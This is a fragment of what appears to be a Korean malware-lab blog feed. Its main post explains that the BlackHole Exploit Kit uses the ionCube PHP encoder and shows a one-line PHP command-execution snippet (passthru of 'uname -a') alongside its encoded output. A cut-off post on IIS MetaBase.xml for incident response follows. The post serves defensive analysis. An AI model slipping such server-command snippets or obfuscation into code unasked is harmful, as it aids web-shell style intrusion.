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&quot; alt=&quot;&quot;&gt;&lt;br /&gt;
&lt;/div&gt;
&lt;br /&gt;
&lt;br /&gt;
http://www.ioncube.com/&lt;br /&gt;
&lt;br /&gt;
BlackHole Exploit Kit에서 사용하고 있는 PHP Encoder입니다.&lt;br /&gt;
&lt;br /&gt;
인터넷에 디코더가 나돌고 있긴 하나 제대로 되는게 없네요 ㅜ.ㅜ&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
평가판 다운로드해서 인코딩해보면 다음과 같습니다.&lt;br /&gt;
&lt;br /&gt;
&lt;span style=&quot;font-weight: bold;&quot;&gt;원본 코드&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;table style=&quot;border-collapse:collapse&quot; bgcolor=&quot;#ffffff&quot; cellpadding=&quot;1&quot; cellspacing=&quot;1&quot; width=&quot;700&quot;&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td style=&quot;border:1px solid #dadada&quot; width=&quot;100%&quot;&gt;&amp;lt;? passthru('uname -a'); ?&amp;gt;&lt;br /&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;span style=&quot;font-weight: bold;&quot;&gt;ionCube로 인코딩된 코드&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;table style=&quot;border-collapse:collapse&quot; bgcolor=&quot;#ffffff&quot; cellpadding=&quot;1&quot; cellspacing=&quot;1&quot; width=&quot;700&quot;&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td style=&quot;border:1px solid #dadada&quot; width=&quot;100%&quot;&gt;&amp;lt;?php //004ff&lt;br /&gt;
// IONCUBE ENCODER 7.0 EVALUATION&lt;br /&gt;
// THIS LICENSE MESSAGE IS ONLY ADDED BY THE EVALUATION ENCODER AND&lt;br /&gt;
// IS NOT PRESENT IN PRODUCTION ENCODED FILES&lt;br /&gt;
&lt;br /&gt;
if(!extension_loaded('ionCube Loader')){$__oc=strtolower(substr(php_uname(),0,3));$__ln='ioncube_loader_'.$__oc.'_'.substr(phpversion(),0,3).(($__oc=='win')?'.dll':'.so');if(function_exists('dl')){@dl($__ln);}if(function_exists('_il_exec')){return _il_exec();}$__ln='/ioncube/'.$__ln;$__oid=$__id=realpath(ini_get('extension_dir'));$__here=dirname(__FILE__);if(strlen($__id)&amp;gt;1&amp;amp;&amp;amp;$__id[1]==':'){$__id=str_replace('\\','/',substr($__id,2));$__here=str_replace('\\','/',substr($__here,2));}$__rd=str_repeat('/..',substr_count($__id,'/')).$__here.'/';$__i=strlen($__rd);while($__i--){if($__rd[$__i]=='/'){$__lp=substr($__rd,0,$__i).$__ln;if(file_exists($__oid.$__lp)){$__ln=$__lp;break;}}}if(function_exists('dl')){@dl($__ln);}}else{die('The file '.__FILE__.&quot; is corrupted.\n&quot;);}if(function_exists('_il_exec')){return _il_exec();}echo('Site error: the file &amp;lt;b&amp;gt;'.__FILE__.'&amp;lt;/b&amp;gt; requires the ionCube PHP Loader '.basename($__ln).' to be installed by the website operator. If you are the website operator please use the &amp;lt;a href=&quot;http://www.ioncube.com/lw/&quot;&amp;gt;ionCube Loader Wizard&amp;lt;/a&amp;gt; to assist with installation.');exit(199);&lt;br /&gt;
?&amp;gt;&lt;br /&gt;
HR+cPxTNjfTCeGhO7UqZjF5z1+P302DsPpDprljXaAIkFbMCrg8ld6kiV07ggjgowQ32AX+ikjnd&lt;br /&gt;
+EaKtV3dX2AC/G0TEbiqvHWVGtTW7q8CFxNFDNb2mU+ScKJP6FZcXZrSLpr5/HovQLDw0HqfPTnP&lt;br /&gt;
x7a7BjMsSFEujkatV8HAMvjP8PIz4/w/FuCiNgXkcpezfQVOJ2ANwBgD2w7g8qqTqK1blwCd/DcE&lt;br /&gt;
GzdUXVo7BPN1/5VEdicuNwE59EtEIMeHzzP7NqzNltGnPMpycdhQGfiNr0LCRAlq5cuPVP3EWemP&lt;br /&gt;
DPrsqrnnp5laqLddnQsmPw/+9hnTSmFjyOlGlIvG4rOCz6qSAbuS9XuZD7dUL53g2YFhXHPN8fr3&lt;br /&gt;
NIUkySY+feyqflcqy725UZ9GMmw3uoYg2PrTUXvjU4sLiyeQvbvmr5HfpZC9fBVtD9FP&lt;br /&gt;
&lt;br /&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;br /&gt;
&lt;br /&gt;
웹 디렉코리에 ionCube Loader를 설치해야 정상적으로 동작합니다.&lt;br /&gt;
&lt;br /&gt;
http://www.ioncube.com/lw/&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;&lt;div class=&quot;entry-ccl&quot; style=&quot;clear: both; text-align: right; margin-bottom: 10px&quot;&gt;
	&lt;img id=&quot;ccl-icon-149-0&quot; class=&quot;entry-ccl-by&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black01.png&quot; alt=&quot;저작자 표시&quot;/&gt;
	&lt;img id=&quot;ccl-icon-149-1&quot; class=&quot;entry-ccl-nc&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black02.png&quot; alt=&quot;비영리&quot;/&gt;
	&lt;img id=&quot;ccl-icon-149-2&quot; class=&quot;entry-ccl-nd&quot; src=&quot;http://i1.daumcdn.net/cfs.tistory/v/0/static/admin/editor/ccl_black03.png&quot; alt=&quot;변경 금지&quot;/&gt;
	&lt;!--
	&lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
		&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
		&lt;/Work&gt;
		&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;
			&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;
		&lt;/License&gt;
	&lt;/rdf:RDF&gt;
	--&gt;
&lt;/div&gt;
&lt;div class=&quot;tt-plugin tt-share-entry-with-sns tt-sns-icon-alignment-right tt-sns-icon-size-big&quot;&gt;
	&lt;div class=&quot;tt-sns-wrap&quot; id=&quot;ttSnsWrap-&quot;&gt;
		&lt;ul class=&quot;tt-sns-service-default&quot;&gt;
			&lt;li class=&quot;tt-sns-service-mypeople&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('mypeople', '', '');&quot;&gt;마이피플&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-twitter&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('twitter', '', '');&quot;&gt;트위터&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-facebook&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('facebook', '', '');&quot;&gt;페이스북&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-other&quot;&gt;&lt;a href=&quot;javascript:;&quot; onmouseover=&quot;ShareEntryWithSNS.showLayer(event, '');&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;더보기&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
		&lt;ul class=&quot;tt-sns-service-more&quot; id=&quot;ttSnsServiceMore-&quot; onmouseout=&quot;ShareEntryWithSNS.hideLayer(event, '');&quot;&gt;
			&lt;li class=&quot;tt-sns-service-me2day&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('me2day', '', '');&quot;&gt;미투데이&lt;/a&gt;&lt;/li&gt;
			&lt;li class=&quot;tt-sns-service-yozm&quot;&gt;&lt;a href=&quot;javascript:;&quot; onclick=&quot;ShareEntryWithSNS.share('yozm', '', '');&quot;&gt;요즘&lt;/a&gt;&lt;/li&gt;
		&lt;/ul&gt;
	&lt;/div&gt;
	&lt;div class=&quot;tt-sns-clear&quot;&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style=&quot;text-align:left; padding-top:10px;&quot;&gt;
&lt;iframe src=&quot;http://www.facebook.com/plugins/like.php?href=malwarelab.tistory.com/149&amp;amp;layout=standard&amp;amp;show_faces=true&amp;amp;width=310&amp;amp;action=like&amp;amp;font=tahoma&amp;amp;colorscheme=light&amp;amp;height=65&quot; scrolling=&quot;no&quot; frameborder=&quot;0&quot; style=&quot;border:none; overflow:hidden; width:310px; height:65px;&quot; allowTransparency=&quot;true&quot;&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;fieldset style=&quot;margin:20px 0px 20px 0px;padding:5px;&quot;&gt;&lt;legend&gt;&lt;span&gt;&lt;strong&gt;크리에이티브 커먼즈 라이선스&lt;/strong&gt;&lt;/span&gt;&lt;/legend&gt;&lt;!--Creative Commons License--&gt;&lt;div style=&quot;float: left; width: 88px; margin-top: 3px;&quot;&gt;&lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;&lt;img alt=&quot;Creative Commons License&quot; style=&quot;border-width: 0&quot; src=&quot;http://i.creativecommons.org/l/by-nc-nd/2.0/kr/88x31.png&quot;/&gt;&lt;/a&gt;&lt;/div&gt;&lt;div style=&quot;margin-left: 92px; margin-top: 3px; text-align: justify;&quot;&gt;이 저작물은 &lt;a rel=&quot;license&quot; href=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; target=&quot;_blank&quot;&gt;크리에이티브 커먼즈 코리아 저작자표시-비영리-변경금지 2.0 대한민국 라이선스&lt;/a&gt;에 따라 이용하실 수 있습니다.
			&lt;!-- Creative Commons License--&gt;
			&lt;!-- &lt;rdf:RDF xmlns=&quot;http://web.resource.org/cc/&quot; xmlns:dc=&quot;http://purl.org/dc/elements/1.1/&quot; xmlns:rdf=&quot;http://www.w3.org/1999/02/22-rdf-syntax-ns#&quot;&gt;
			&lt;Work rdf:about=&quot;&quot;&gt;
			&lt;license rdf:resource=&quot;http://creativecommons.org/licenses/by-nc-nd/2.0/kr/&quot; /&gt;
			&lt;/Work&gt;
			&lt;License rdf:about=&quot;http://creativecommons.org/licenses/by-nc-nd/&quot;&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Reproduction&quot;/&gt;
			&lt;permits rdf:resource=&quot;http://web.resource.org/cc/Distribution&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Notice&quot;/&gt;
			&lt;requires rdf:resource=&quot;http://web.resource.org/cc/Attribution&quot;/&gt;&lt;prohibits rdf:resource=&quot;http://web.resource.org/cc/CommercialUse&quot;/&gt;&lt;/License&gt;&lt;/rdf:RDF&gt; --&gt;&lt;/div&gt;&lt;/fieldset&gt;</description>
			<category>0x04 reference&amp;tools</category>
			<category>iconCube</category>
			<category>php encoder</category>
			<author>demantos</author>
			<guid>http://malwarelab.tistory.com/149</guid>
			<comments>http://malwarelab.tistory.com/entry/ionCube-PHP-Encoder#entry149comment</comments>
			<pubDate>Fri, 16 Sep 2011 17:46:14 +0900</pubDate>
		</item>
		<item>
			<title>IIS MetaBase.xml 파일</title>
			<link>http://malwarelab.tistory.com/entry/MetaBasexml-%ED%8C%8C%EC%9D%BC</link>
			<description>&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
요즘 침해사고 조사가 많아 매번 손으로 작업하기 귀찮아 스크립트를 하나 만들고 있습니다.&lt;br /&gt;
&lt;br /&gt;
포렌식 측면에서 보면 이미지를 떠와서 하는게 가장 좋겠지만 그럴만한 상황도 안되고&lt;br /&gt;
&lt;br /&gt;
